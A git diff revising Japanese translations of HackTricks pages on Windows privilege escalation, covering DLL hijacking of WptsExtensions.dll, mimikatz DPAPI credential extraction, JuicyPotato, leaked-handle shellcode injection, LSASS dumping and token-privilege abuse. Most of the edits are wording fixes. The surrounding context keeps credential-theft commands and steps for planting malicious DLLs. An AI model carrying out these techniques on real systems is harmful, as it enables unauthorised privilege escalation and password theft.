+これを見つけた後、[**WptsExtensions.dllを利用して特権昇格する方法**](https://juggernaut-sec.com/dll-hijacking/#Windows_10_Phantom_DLL_Hijacking_-_WptsExtensionsdll)を説明している興味深いブログ記事を見つけました。これが今から **行うこと** です。
 
 ### 悪用
 
-したがって、**特権を昇格**させるために、ライブラリ **WptsExtensions.dll** をハイジャックします。**パス**と**名前**がわかれば、悪意のあるdllを**生成**するだけです。
+したがって、**特権を昇格**させるために、ライブラリ **WptsExtensions.dll** をハイジャックします。**パス** と **名前** が分かれば、悪意のあるdllを **生成** するだけです。
 
 [**これらの例のいずれかを使用してみることができます**](./#creating-and-compiling-dlls)。リバースシェルを取得したり、ユーザーを追加したり、ビーコンを実行したりするペイロードを実行できます...
 
 > [!WARNING]
 > すべてのサービスが **`NT AUTHORITY\SYSTEM`** で実行されているわけではなく、一部は **`NT AUTHORITY\LOCAL SERVICE`** で実行されており、**権限が少ない**ため、新しいユーザーを作成することはできません。\
-> ただし、そのユーザーには **`seImpersonate`** 権限があるため、[**ポテトスイートを使用して特権を昇格**](../roguepotato-and-printspoofer.md)できます。この場合、リバースシェルはユーザーを作成しようとするよりも良い選択です。
+> ただし、そのユーザーには **`seImpersonate`** 権限があるため、[**ポテトスイートを使用して特権を昇格することができます**](../roguepotato-and-printspoofer.md)。したがって、この場合、リバースシェルはユーザーを作成しようとするよりも良い選択です。
 
-執筆時点で、**タスクスケジューラ**サービスは **Nt AUTHORITY\SYSTEM** で実行されています。
+執筆時点で、**タスクスケジューラ** サービスは **Nt AUTHORITY\SYSTEM** で実行されています。
 
-**悪意のあるDllを生成した後**（私の場合はx64リバースシェルを使用し、シェルを取得しましたが、defenderがmsfvenomからのものであるため、それを殺しました）、書き込み可能なシステムパスに **WptsExtensions.dll** という名前で保存し、コンピュータを **再起動**します（またはサービスを再起動するか、影響を受けたサービス/プログラムを再実行するために必要なことを行います）。
+**悪意のあるDllを生成した後**（私の場合はx64リバースシェルを使用し、シェルを取得しましたが、defenderがmsfvenomからのものであるため、それを殺しました）、書き込み可能なシステムパスに **WptsExtensions.dll** という名前で保存し、コンピュータを **再起動** します（またはサービスを再起動するか、影響を受けたサービス/プログラムを再実行するために必要なことを行います）。
 
-サービスが再起動されると、**dllが読み込まれ、実行されるはずです**（**procmon**トリックを再利用して、**ライブラリが期待通りに読み込まれたかどうかを確認できます）。
+サービスが再起動されると、**dllが読み込まれ、実行されるはずです**（**procmon** トリックを再利用して、**ライブラリが期待通りに読み込まれたかどうかを確認できます）。
 
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.md b/src/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.md
index 02a7af670..855d63b90 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.md
@@ -26,16 +26,16 @@ vaultcmd /listcreds:"Windows Credentials" /all
 # From mimikatz
 mimikatz vault::list
 ```
-## 認証ファイル
+## Credential Files
 
-**保護された認証ファイル**は、次の場所にあります:
+**保護された資格情報ファイル**は、次の場所にあります:
 ```
 dir /a:h C:\Users\username\AppData\Local\Microsoft\Credentials\
 dir /a:h C:\Users\username\AppData\Roaming\Microsoft\Credentials\
 Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\
 Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\
 ```
-mimikatz `dpapi::cred`を使用して資格情報情報を取得すると、暗号化されたデータやguidMasterKeyなどの興味深い情報を見つけることができます。
+mimikatz `dpapi::cred`を使用して資格情報情報を取得すると、暗号化データやguidMasterKeyなどの興味深い情報を見つけることができます。
 ```bash
 mimikatz dpapi::cred /in:C:\Users\<username>\AppData\Local\Microsoft\Credentials\28350839752B38B238E5D56FDD7891A7
 
diff --git a/src/windows-hardening/windows-local-privilege-escalation/integrity-levels.md b/src/windows-hardening/windows-local-privilege-escalation/integrity-levels.md
index 17ffff06a..813a721e1 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/integrity-levels.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/integrity-levels.md
@@ -9,7 +9,7 @@ Windows Vista以降のバージョンでは、すべての保護されたアイ
 重要なルールは、オブジェクトのレベルよりも低いインテグリティレベルを持つプロセスによってオブジェクトが変更されることはできないということです。インテグリティレベルは次のとおりです：
 
 - **信頼されていない**: このレベルは匿名ログインを持つプロセス用です。 %%%例: Chrome%%%
-- **低**: 主にインターネットの相互作用、特にInternet Explorerの保護モードで、関連するファイルやプロセス、**一時インターネットフォルダー**のような特定のフォルダーに影響を与えます。低インテグリティプロセスは、レジストリへの書き込みアクセスがないことや、ユーザープロファイルへの書き込みアクセスが制限されるなど、重大な制限に直面します。
+- **低**: 主にインターネットの相互作用、特にInternet Explorerの保護モードで、関連するファイルやプロセス、**一時インターネットフォルダー**のような特定のフォルダーに影響を与えます。低インテグリティプロセスは、レジストリへの書き込みアクセスがないことや、ユーザープロファイルへの書き込みアクセスが制限されるなど、重大な制約に直面します。
 - **中**: ほとんどの活動のデフォルトレベルで、標準ユーザーや特定のインテグリティレベルを持たないオブジェクトに割り当てられます。管理者グループのメンバーでさえ、デフォルトではこのレベルで動作します。
 - **高**: 管理者専用で、低いインテグリティレベルのオブジェクトを変更できるようにし、高レベル自体のオブジェクトも含まれます。
 - **システム**: Windowsカーネルとコアサービスの最高の操作レベルで、管理者でさえ手が届かないため、重要なシステム機能を保護します。
@@ -25,7 +25,7 @@ Windows Vista以降のバージョンでは、すべての保護されたアイ
 
 ### ファイルシステムにおけるインテグリティレベル
 
-ファイルシステム内のオブジェクトは**最小インテグリティレベル要件**を必要とする場合があり、プロセスがこのインテグリティを持っていない場合、相互作用できません。\
+ファイルシステム内のオブジェクトには**最小インテグリティレベル要件**が必要な場合があり、プロセスがこのインテグリティを持っていない場合、相互作用できません。\
 例えば、**通常のユーザーコンソールから通常のファイルを作成し、権限を確認しましょう**:
 ```
 echo asd >asd.txt
@@ -52,7 +52,7 @@ NT AUTHORITY\SERVICE:(I)(M,DC)
 NT AUTHORITY\BATCH:(I)(M,DC)
 Mandatory Label\High Mandatory Level:(NW)
 ```
-ここが面白くなるところです。ユーザー `DESKTOP-IDJHTKP\user` がファイルに対して **完全な権限** を持っていることがわかります（実際、このユーザーがファイルを作成しました）が、実装された最小の整合性レベルのため、彼は高い整合性レベル内で実行していない限り、ファイルを変更することができません（彼はそれを読むことはできますが）。
+ここが面白くなるところです。ユーザー `DESKTOP-IDJHTKP\user` がファイルに対して **完全な権限** を持っていることがわかります（実際、このユーザーがファイルを作成しました）が、実装された最小の整合性レベルのため、彼は高い整合性レベル内で実行していない限り、ファイルを変更することができません（ただし、読むことはできます）。
 ```
 echo 1234 > asd.txt
 Access is denied.
@@ -76,11 +76,11 @@ APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
 APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APP PACKAGES:(I)(RX)
 Mandatory Label\Low Mandatory Level:(NW)
 ```
-今、`cmd-low.exe`を実行すると、**低い整合性レベル**で実行されます。
+今、`cmd-low.exe`を実行すると、**低い整合性レベル**で実行されます。中程度の整合性レベルではありません。
 
 ![](<../../images/image (313).png>)
 
-好奇心のある人のために、高い整合性レベルをバイナリに割り当てると（`icacls C:\Windows\System32\cmd-high.exe /setintegritylevel high`）、自動的に高い整合性レベルで実行されるわけではありません（中程度の整合性レベルから呼び出すと、デフォルトで中程度の整合性レベルで実行されます）。
+好奇心のある人のために、バイナリに高い整合性レベルを割り当てると（`icacls C:\Windows\System32\cmd-high.exe /setintegritylevel high`）、自動的に高い整合性レベルで実行されるわけではありません（中程度の整合性レベルから呼び出すと、デフォルトで中程度の整合性レベルで実行されます）。
 
 ### プロセスの整合性レベル
 
diff --git a/src/windows-hardening/windows-local-privilege-escalation/juicypotato.md b/src/windows-hardening/windows-local-privilege-escalation/juicypotato.md
index dcb47120e..c76f81f61 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/juicypotato.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/juicypotato.md
@@ -3,7 +3,7 @@
 {{#include ../../banners/hacktricks-training.md}}
 
 > [!WARNING]
-> **JuicyPotatoは** Windows Server 2019 および Windows 10 ビルド 1809 以降では動作しません。しかし、[**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**、** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**、** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato) を使用して **同じ特権を利用し、`NT AUTHORITY\SYSTEM`** レベルのアクセスを取得できます。 _**確認:**_
+> **JuicyPotatoは** Windows Server 2019 および Windows 10 ビルド 1809 以降では動作しません。しかし、 [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**、** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**、** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato) を使用して **同じ特権を利用し、`NT AUTHORITY\SYSTEM`** レベルのアクセスを取得できます。 _**確認:**_
 
 {{#ref}}
 roguepotato-and-printspoofer.md
@@ -19,7 +19,7 @@ _少しのジュースを加えた_ [_RottenPotatoNG_](https://github.com/breenm
 
 [**juicy-potato Readme から**](https://github.com/ohpe/juicy-potato/blob/master/README.md)**:**
 
-[RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG) とその [バリアント](https://github.com/decoder-it/lonelypotato) は、[`BITS`](<https://msdn.microsoft.com/en-us/library/windows/desktop/bb968799(v=vs.85).aspx>) [サービス](https://github.com/breenmachine/RottenPotatoNG/blob/4eefb0dd89decb9763f2bf52c7a067440a9ec1f0/RottenPotatoEXE/MSFRottenPotato/MSFRottenPotato.cpp#L126) に基づく特権昇格チェーンを利用し、`127.0.0.1:6666` で MiTM リスナーを持ち、`SeImpersonate` または `SeAssignPrimaryToken` 特権を持っている場合に機能します。Windows ビルドレビュー中に、`BITS` が意図的に無効にされ、ポート `6666` が使用されている設定を見つけました。
+[RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG) とその [バリアント](https://github.com/decoder-it/lonelypotato) は、[`BITS`](<https://msdn.microsoft.com/en-us/library/windows/desktop/bb968799(v=vs.85).aspx>) [サービス](https://github.com/breenmachine/RottenPotatoNG/blob/4eefb0dd89decb9763f2bf52c7a067440a9ec1f0/RottenPotatoEXE/MSFRottenPotato/MSFRottenPotato.cpp#L126) に基づく特権昇格チェーンを利用し、`127.0.0.1:6666` で MiTM リスナーを持ち、`SeImpersonate` または `SeAssignPrimaryToken` 特権を持っているときに機能します。Windows ビルドレビュー中に、`BITS` が意図的に無効にされ、ポート `6666` が使用されている設定を見つけました。
 
 私たちは [RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG) を武器化することに決めました: **Juicy Potato にこんにちはを言いましょう**。
 
@@ -81,7 +81,7 @@ Optional args:
 
 ## 例
 
-注意: CLSIDのリストについては [このページ](https://ohpe.it/juicy-potato/CLSID/) を訪れてください。
+注意: CLSIDのリストを試すには、[このページ](https://ohpe.it/juicy-potato/CLSID/)を訪れてください。
 
 ### nc.exeリバースシェルを取得する
 ```
@@ -118,7 +118,7 @@ c:\Users\Public>
 
 次に、[test_clsid.bat](https://github.com/ohpe/juicy-potato/blob/master/Test/test_clsid.bat)をダウンロードし（CLSIDリストとjuicypotato実行可能ファイルへのパスを変更）、実行します。これにより、すべてのCLSIDを試し始め、**ポート番号が変更されると、CLSIDが機能したことを意味します**。
 
-**パラメータ-cを使用して**動作するCLSIDを**確認してください**
+**-cパラメータを使用して**動作するCLSIDを**確認してください**
 
 ## 参考文献
 
diff --git a/src/windows-hardening/windows-local-privilege-escalation/leaked-handle-exploitation.md b/src/windows-hardening/windows-local-privilege-escalation/leaked-handle-exploitation.md
index 2ba67f4e2..b6cfc02ec 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/leaked-handle-exploitation.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/leaked-handle-exploitation.md
@@ -10,7 +10,7 @@
 
 すでにいくつかの**特権昇格**のケースがあり、**オープンで継承可能なハンドル**を持つ**特権プロセス**が**特権のないプロセス**を**実行**し、その**すべてのハンドルへのアクセス**を与えています。
 
-例えば、**SYSTEMとして実行されているプロセスが新しいプロセスを開く**(`OpenProcess()`)と、**フルアクセス**を持つ場合を考えてみてください。同じプロセスが**低特権の新しいプロセスを作成**(`CreateProcess()`)し、**メインプロセスのすべてのオープンハンドルを継承**します。\
+例えば、**SYSTEMとして実行されているプロセスが新しいプロセスを開く**(`OpenProcess()`)と、**フルアクセス**を持つ場合を考えてみてください。同じプロセスが**メインプロセスのすべてのオープンハンドルを継承する**低特権の新しいプロセスを**作成**します。\
 その後、**低特権プロセスにフルアクセス**があれば、`OpenProcess()`で作成された**特権プロセスへのオープンハンドルを取得**し、**シェルコードを注入**できます。
 
 ## **Interesting Handles**
@@ -49,9 +49,9 @@
 
 [**Process Hacker**](https://github.com/processhacker/processhacker)は、無料でダウンロードできるツールです。プロセスを検査するための素晴らしいオプションがいくつかあり、その1つは**各プロセスのハンドルを見る能力**です。
 
-すべてのプロセスのすべてのハンドルを見るには、**SeDebugPrivilegeが必要**です（したがって、Process Hackerを管理者として実行する必要があります）。
+すべてのプロセスのすべてのハンドルを見るには、**SeDebugPrivilegeが必要**です（そのため、Process Hackerを管理者として実行する必要があります）。
 
-プロセスのハンドルを見るには、プロセスを右クリックしてハンドルを選択します：
+プロセスのハンドルを見るには、プロセスを右クリックし、ハンドルを選択します：
 
 ![](<../../images/image (616).png>)
 
@@ -82,7 +82,7 @@
 
 ## Vulnerable Example
 
-例えば、以下のコードは**脆弱なWindowsサービス**に属します。このサービスバイナリの脆弱なコードは**`Exploit`**関数内にあります。この関数は**フルアクセスの新しいハンドルプロセスを作成**し始めます。次に、**低特権プロセスを作成**しています（_explorer.exe_の低特権トークンをコピーすることによって）、_C:\users\username\desktop\client.exe_を実行します。**脆弱性は、`bInheritHandles`を`TRUE`として低特権プロセスを作成していることにあります**。
+例えば、以下のコードは**脆弱なWindowsサービス**に属します。このサービスバイナリの脆弱なコードは**`Exploit`**関数内にあります。この関数は**フルアクセスの新しいハンドルプロセスを作成**し始めます。次に、**低特権プロセスを作成**します（_explorer.exe_の低特権トークンをコピーすることによって）、_C:\users\username\desktop\client.exe_を実行します。**脆弱性は、`bInheritHandles`を`TRUE`として低特権プロセスを作成している点にあります**。
 
 したがって、この低特権プロセスは最初に作成された高特権プロセスのハンドルを取得し、シェルコードを注入して実行することができます（次のセクションを参照）。
 ```c
@@ -293,7 +293,7 @@ return 0;
 ### Exploit Example 1
 
 > [!NOTE]
-> 実際のシナリオでは、脆弱なコードによって実行されるバイナリを**制御することはできない**でしょう（この場合は_C:\users\username\desktop\client.exe_）。おそらく、**プロセスを侵害し、特権プロセスの脆弱なハンドルにアクセスできるかどうかを確認する必要があります**。
+> 実際のシナリオでは、脆弱なコードによって実行されるバイナリを**制御できない可能性が高い**です（この場合は_C:\users\username\desktop\client.exe_）。おそらく、**プロセスを妥協し、特権プロセスの脆弱なハンドルにアクセスできるかどうかを確認する必要があります**。
 
 この例では、_C:\users\username\desktop\client.exe_の可能なエクスプロイトのコードを見つけることができます。\
 このコードの最も興味深い部分は`GetVulnProcHandle`にあります。この関数は**すべてのハンドルを取得し始め**、次に**それらのいずれかが同じPIDに属しているかどうかを確認し**、ハンドルが**プロセス**に属しているかどうかを確認します。これらの要件がすべて満たされると（アクセス可能なオープンプロセスハンドルが見つかると）、**プロセスのハンドルを悪用してシェルコードを注入し実行しようとします**。\
@@ -505,9 +505,9 @@ return 0;
 > [!NOTE]
 > 実際のシナリオでは、脆弱なコードによって実行されるバイナリを**制御できない可能性が高い**です（この場合は_C:\users\username\desktop\client.exe_）。おそらく、**プロセスを侵害し、特権プロセスの脆弱なハンドルにアクセスできるかどうかを確認する必要があります**。
 
-この例では、**シェルコードを注入して実行するためにオープンハンドルを悪用する代わりに**、**特権オープンハンドルプロセスのトークンを使用して新しいプロセスを作成します**。これは138行目から148行目で行われます。
+この例では、**シェルコードを注入して実行するためにオープンハンドルを悪用する代わりに**、**特権オープンハンドルプロセスのトークンを使用して新しいプロセスを作成します**。これは、138行目から148行目で行われます。
 
-**関数 `UpdateProcThreadAttribute`** が**属性 `PROC_THREAD_ATTRIBUTE_PARENT_PROCESS` とオープン特権プロセスへのハンドル**と共に使用されていることに注意してください。これは、**作成されたプロセススレッドが\_cmd.exe**\_\*\*を実行する際に、オープンハンドルプロセスと同じトークン特権を持つことを意味します\*\*。
+**関数 `UpdateProcThreadAttribute`** が **属性 `PROC_THREAD_ATTRIBUTE_PARENT_PROCESS` とオープン特権プロセスへのハンドル** と共に使用されていることに注意してください。これは、**作成されたプロセススレッドが \_cmd.exe**\_\*\* を実行する際に、オープンハンドルプロセスと同じトークン特権を持つことを意味します\*\*。
 ```c
 #include <windows.h>
 #include <stdio.h>
diff --git a/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.md b/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.md
index 9c4fd7768..6737e5d2b 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.md
@@ -36,7 +36,7 @@ juicypotato.md
 
 ### SeBackupPrivilege
 
-この特権により、システムは任意のファイルに対して**すべての読み取りアクセス**制御を付与します（読み取り操作に制限されます）。これは、レジストリからローカル管理者アカウントのパスワードハッシュを**読み取る**ために利用され、その後、ハッシュを使用して「**psexec**」や「**wmiexec**」などのツールを使用できます（Pass-the-Hash技術）。ただし、この技術は、ローカル管理者アカウントが無効になっている場合や、リモート接続するローカル管理者から管理権限を削除するポリシーがある場合に失敗します。\
+この特権により、システムは任意のファイルに対して**すべての読み取りアクセス**制御を付与します（読み取り操作に制限されます）。これは、レジストリからローカル管理者アカウントのパスワードハッシュを**読み取る**ために利用され、その後、ハッシュを使用して「**psexec**」や「**wmiexec**」などのツールを使用できます（Pass-the-Hash技術）。ただし、この技術は、ローカル管理者アカウントが無効になっている場合や、リモート接続するローカル管理者から管理権限を削除するポリシーが適用されている場合に失敗します。\
 この特権を**悪用する**ことができます：
 
 - [https://github.com/Hackplayers/PsCabesha-tools/blob/master/Privesc/Acl-FullControl.ps1](https://github.com/Hackplayers/PsCabesha-tools/blob/master/Privesc/Acl-FullControl.ps1)
@@ -66,7 +66,7 @@ SeCreateTokenPrivilegeは強力な権限であり、特にユーザーがトー
 
 この特権は、特定の値を持つレジストリエントリを作成することで**デバイスドライバをロードおよびアンロード**することを許可します。`HKLM`（HKEY_LOCAL_MACHINE）への直接書き込みアクセスが制限されているため、`HKCU`（HKEY_CURRENT_USER）を代わりに使用する必要があります。ただし、ドライバ構成のために`HKCU`をカーネルに認識させるには、特定のパスに従う必要があります。
 
-このパスは`\Registry\User\<RID>\System\CurrentControlSet\Services\DriverName`であり、`<RID>`は現在のユーザーの相対識別子です。`HKCU`内でこの全パスを作成し、2つの値を設定する必要があります：
+このパスは`\Registry\User\<RID>\System\CurrentControlSet\Services\DriverName`であり、`<RID>`は現在のユーザーの相対識別子です。`HKCU`内にこの全パスを作成し、2つの値を設定する必要があります：
 
 - `ImagePath`、実行されるバイナリへのパス
 - `Type`、値は`SERVICE_KERNEL_DRIVER`（`0x00000001`）。
@@ -92,7 +92,7 @@ reg.CloseKey(key)
 
 ### SeTakeOwnershipPrivilege
 
-これは **SeRestorePrivilege** に似ています。その主な機能は、プロセスが **オブジェクトの所有権を引き受ける** ことを可能にし、WRITE_OWNER アクセス権を提供することで明示的な裁量的アクセスの要件を回避します。このプロセスは、まず書き込み目的のために対象のレジストリキーの所有権を確保し、その後 DACL を変更して書き込み操作を有効にすることを含みます。
+これは **SeRestorePrivilege** に似ています。その主な機能は、プロセスが **オブジェクトの所有権を引き受ける** ことを可能にし、WRITE_OWNER アクセス権の提供を通じて明示的な裁量的アクセスの要件を回避します。このプロセスは、まず書き込み目的のために対象のレジストリキーの所有権を確保し、その後 DACL を変更して書き込み操作を有効にすることを含みます。
 ```bash
 takeown /f 'C:\some\file.txt' #Now the file is owned by you
 icacls 'C:\some\file.txt' /grant <your_username>:F #Now you have full access
@@ -114,7 +114,7 @@ c:\inetpub\wwwwroot\web.config
 
 #### メモリのダンプ
 
-[ProcDump](https://docs.microsoft.com/en-us/sysinternals/downloads/procdump)を使用して、[SysInternals Suite](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite)から**プロセスのメモリをキャプチャ**できます。具体的には、ユーザーがシステムに正常にログインした後にユーザーの資格情報を保存する**ローカルセキュリティ機関サブシステムサービス（**[**LSASS**](https://en.wikipedia.org/wiki/Local_Security_Authority_Subsystem_Service)**）**プロセスに適用できます。
+[ProcDump](https://docs.microsoft.com/en-us/sysinternals/downloads/procdump)を使用して、[SysInternals Suite](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite)から**プロセスのメモリをキャプチャ**できます。具体的には、ユーザーがシステムに正常にログインした後にユーザー資格情報を保存する**ローカルセキュリティ機関サブシステムサービス（**[**LSASS**](https://en.wikipedia.org/wiki/Local_Security_Authority_Subsystem_Service)**）**プロセスに適用できます。
 
 その後、このダンプをmimikatzにロードしてパスワードを取得できます：
 ```
@@ -142,7 +142,7 @@ whoami /priv
 
 ### すべてのトークンを有効にする
 
-トークンが無効になっている場合は、スクリプト[**EnableAllTokenPrivs.ps1**](https://raw.githubusercontent.com/fashionproof/EnableAllTokenPrivs/master/EnableAllTokenPrivs.ps1)を使用してすべてのトークンを有効にすることができます。
+トークンが無効になっている場合は、スクリプト[**EnableAllTokenPrivs.ps1**](https://raw.githubusercontent.com/fashionproof/EnableAllTokenPrivs/master/EnableAllTokenPrivs.ps1)を使用してすべてのトークンを有効にすることができます：
 ```powershell
 .\EnableAllTokenPrivs.ps1
 whoami /priv
@@ -155,7 +155,7 @@ Full token privileges cheatsheet at [https://github.com/gtworek/Priv2Admin](http
 
 | Privilege                  | Impact      | Tool                    | Execution path                                                                                                                                                                                                                                                                                                                                     | Remarks                                                                                                                                                                                                                                                                                                                        |
 | -------------------------- | ----------- | ----------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ |
-| **`SeAssignPrimaryToken`** | _**Admin**_ | 3rd party tool          | _"ユーザーがトークンを偽装し、potato.exe、rottenpotato.exe、juicypotato.exeなどのツールを使用してntシステムに昇格することを許可します"_                                                                                                                                                                                                      | Thank you [Aurélien Chalot](https://twitter.com/Defte_) for the update. I will try to re-phrase it to something more recipe-like soon.                                                                                                                                                                                         |
+| **`SeAssignPrimaryToken`** | _**Admin**_ | 3rd party tool          | _"ユーザーがトークンを偽装し、potato.exe、rottenpotato.exe、juicypotato.exeなどのツールを使用してntシステムに昇格することを可能にします"_                                                                                                                                                                                                      | Thank you [Aurélien Chalot](https://twitter.com/Defte_) for the update. I will try to re-phrase it to something more recipe-like soon.                                                                                                                                                                                         |
 | **`SeBackup`**             | **Threat**  | _**Built-in commands**_ | `robocopy /b`を使用して機密ファイルを読み取る                                                                                                                                                                                                                                                                                                             | <p>- %WINDIR%\MEMORY.DMPを読み取ることができる場合、より興味深いかもしれません。<br><br>- <code>SeBackupPrivilege</code>（およびrobocopy）は、オープンファイルに関しては役に立ちません。<br><br>- Robocopyは、/bパラメータで動作するためにSeBackupとSeRestoreの両方を必要とします。</p>                                                                      |
 | **`SeCreateToken`**        | _**Admin**_ | 3rd party tool          | `NtCreateToken`を使用してローカル管理者権限を含む任意のトークンを作成する。                                                                                                                                                                                                                                                                          |                                                                                                                                                                                                                                                                                                                                |
 | **`SeDebug`**              | _**Admin**_ | **PowerShell**          | `lsass.exe`トークンを複製する。                                                                                                                                                                                                                                                                                                                   | Script to be found at [FuzzySecurity](https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Conjure-LSASS.ps1)                                                                                                                                                                                                         |
diff --git a/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens/README.md b/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens/README.md
index 609bae1b4..f20b8723b 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens/README.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens/README.md
@@ -32,11 +32,11 @@
 
 ### SeTcbPrivilege
 
-このトークンが有効になっている場合、**KERB_S4U_LOGON**を使用して、資格情報を知らなくても他のユーザーの**偽装トークン**を取得でき、**任意のグループ**（管理者）をトークンに追加し、トークンの**整合性レベル**を「**中**」に設定し、このトークンを**現在のスレッド**に割り当てることができます（SetThreadToken）。
+このトークンが有効になっている場合、**KERB_S4U_LOGON**を使用して、資格情報を知らなくても他のユーザーの**偽装トークン**を取得できます。また、トークンに**任意のグループ**（管理者）を追加し、トークンの**整合性レベル**を「**中**」に設定し、このトークンを**現在のスレッド**に割り当てることができます（SetThreadToken）。
 
 ### SeBackupPrivilege
 
-この特権により、システムは任意のファイルに対して**すべての読み取りアクセス**制御を付与します（読み取り操作に限定）。これは、レジストリからローカル管理者アカウントのパスワードハッシュを**読み取る**ために利用され、その後、"**psexec**"や"**wmiexec**"などのツールをハッシュと共に使用できます（Pass-the-Hash技術）。ただし、この技術は、ローカル管理者アカウントが無効になっている場合や、リモート接続するローカル管理者から管理権限を削除するポリシーがある場合に失敗します。\
+この特権により、システムは任意のファイルに**すべての読み取りアクセス**制御を付与します（読み取り操作に制限されます）。これは、レジストリからローカル管理者アカウントのパスワードハッシュを**読み取る**ために利用され、その後、ハッシュを使用して「**psexec**」や「**wmiexec**」などのツールを使用できます（Pass-the-Hash技術）。ただし、この技術は、ローカル管理者アカウントが無効になっている場合や、リモート接続するローカル管理者から管理権限を削除するポリシーがある場合に失敗します。\
 この特権を**悪用する**ことができます：
 
 - [https://github.com/Hackplayers/PsCabesha-tools/blob/master/Privesc/Acl-FullControl.ps1](https://github.com/Hackplayers/PsCabesha-tools/blob/master/Privesc/Acl-FullControl.ps1)
@@ -50,11 +50,11 @@
 
 ### SeRestorePrivilege
 
-この特権は、ファイルのアクセス制御リスト（ACL）に関係なく、任意のシステムファイルへの**書き込みアクセス**を提供します。これにより、**サービスの変更**、DLLハイジャックの実行、Image File Execution Optionsを介した**デバッガの設定**など、特権昇格のための多くの可能性が開かれます。
+この特権は、ファイルのアクセス制御リスト（ACL）に関係なく、任意のシステムファイルへの**書き込みアクセス**を許可します。これにより、サービスの**変更**、DLLハイジャックの実行、Image File Execution Optionsを介した**デバッガの設定**など、特権昇格のための多くの可能性が開かれます。
 
 ### SeCreateTokenPrivilege
 
-SeCreateTokenPrivilegeは強力な権限であり、特にユーザーがトークンを偽装する能力を持っている場合に有用ですが、SeImpersonatePrivilegeがない場合にも役立ちます。この能力は、同じユーザーを表すトークンを偽装する能力に依存し、その整合性レベルが現在のプロセスの整合性レベルを超えないことが条件です。
+SeCreateTokenPrivilegeは強力な権限であり、特にユーザーがトークンを偽装する能力を持っている場合に便利ですが、SeImpersonatePrivilegeがない場合にも有用です。この能力は、同じユーザーを表すトークンを偽装する能力に依存し、その整合性レベルが現在のプロセスの整合性レベルを超えないことが条件です。
 
 **重要なポイント：**
 
@@ -74,7 +74,7 @@ SeCreateTokenPrivilegeは強力な権限であり、特にユーザーがトー
 **従うべき手順：**
 
 1. 制限された書き込みアクセスのために`HKLM`の代わりに`HKCU`にアクセスします。
-2. `HKCU`内に`\Registry\User\<RID>\System\CurrentControlSet\Services\DriverName`のパスを作成し、`<RID>`は現在のユーザーの相対識別子を表します。
+2. `HKCU`内に`\Registry\User\<RID>\System\CurrentControlSet\Services\DriverName`のパスを作成します。ここで、`<RID>`は現在のユーザーの相対識別子を表します。
 3. `ImagePath`をバイナリの実行パスに設定します。
 4. `Type`を`SERVICE_KERNEL_DRIVER`（`0x00000001`）として割り当てます。
 ```python
@@ -114,7 +114,7 @@ c:\inetpub\wwwwroot\web.config
 
 #### メモリのダンプ
 
-[ProcDump](https://docs.microsoft.com/en-us/sysinternals/downloads/procdump)を使用して、[SysInternals Suite](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite)から**プロセスのメモリをキャプチャ**できます。具体的には、ユーザーがシステムに正常にログインした後にユーザー資格情報を保存する**ローカルセキュリティ認証サブシステムサービス（[LSASS](https://en.wikipedia.org/wiki/Local_Security_Authority_Subsystem_Service)）**プロセスに適用できます。
+[ProcDump](https://docs.microsoft.com/en-us/sysinternals/downloads/procdump)を使用して、[SysInternals Suite](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite)から**プロセスのメモリをキャプチャ**できます。具体的には、ユーザーがシステムに正常にログインした後にユーザーの資格情報を保存する責任を持つ**ローカルセキュリティ機関サブシステムサービス（[LSASS](https://en.wikipedia.org/wiki/Local_Security_Authority_Subsystem_Service)）**プロセスに適用できます。
 
 その後、このダンプをmimikatzにロードしてパスワードを取得できます：
 ```
@@ -136,11 +136,11 @@ import-module psgetsys.ps1; [MyProcess]::CreateProcessFromParent(<system_pid>,<c
 ```
 ### SeManageVolumePrivilege
 
-`SeManageVolumePrivilege` は、ユーザーがディスクボリュームを管理することを許可する Windows のユーザー権限であり、ボリュームの作成や削除を含みます。管理者向けに設計されていますが、非管理者ユーザーに付与されると、特権昇格に悪用される可能性があります。
